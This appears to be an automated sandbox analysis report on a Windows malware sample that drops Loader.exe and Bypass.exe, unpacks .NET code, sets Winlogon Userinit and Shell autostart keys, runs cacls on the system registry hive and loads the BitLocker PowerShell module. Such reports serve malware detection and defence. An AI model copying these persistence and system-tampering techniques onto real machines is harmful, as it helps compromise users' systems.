Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: hC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: yC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \|C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: bFZYRLnRIz.exe, 572stuOQ0pZG2Xj.exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: vC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp

Source: bFZYRLnRIz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bFZYRLnRIz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bFZYRLnRIz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bFZYRLnRIz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bFZYRLnRIz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 15.2.Bypass.exe.1b5c0000.4.raw.unpack, -.cs

.Net Code: _0001 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

File created: C:\Users\user\AppData\Local\Temp\Loader\__tmp_rar_sfx_access_check_5195312

Jump to behavior

Source: bFZYRLnRIz.exe	Static PE information: section name: .didat
Source: bFZYRLnRIz.exe	Static PE information: section name: _RDATA
Source: 572stuOQ0pZG2Xj.exe.0.dr	Static PE information: section name: .didat
Source: 572stuOQ0pZG2Xj.exe.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716155156 push rsi; retf	0_2_00007FF716155157
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716155166 push rsi; retf	0_2_00007FF716155167
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D365156 push rsi; retf	11_2_00007FF64D365157
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D365166 push rsi; retf	11_2_00007FF64D365167
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009C7205 push ecx; ret	12_2_009C7218
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1F51A push ds; iretd	12_2_00A1F523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004403F7 push ds; retf	13_2_004403FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043FC98 pushfd ; ret	13_2_0043FC99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00429522 push ds; iretd	13_2_0042952B
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAE3074 push ebx; iretd	15_2_00007FFD9BAE307A
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Code function: 15_2_00007FFD9BAD74B1 pushfd ; ret	15_2_00007FFD9BAD74B2

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	File created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	File created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	File created: C:\ProgramData\SoftwareDistribution\Bypass.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe

File created: C:\ProgramData\SoftwareDistribution\Bypass.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System32\reg.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit			Jump to behavior
Source: C:\Windows\System32\reg.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
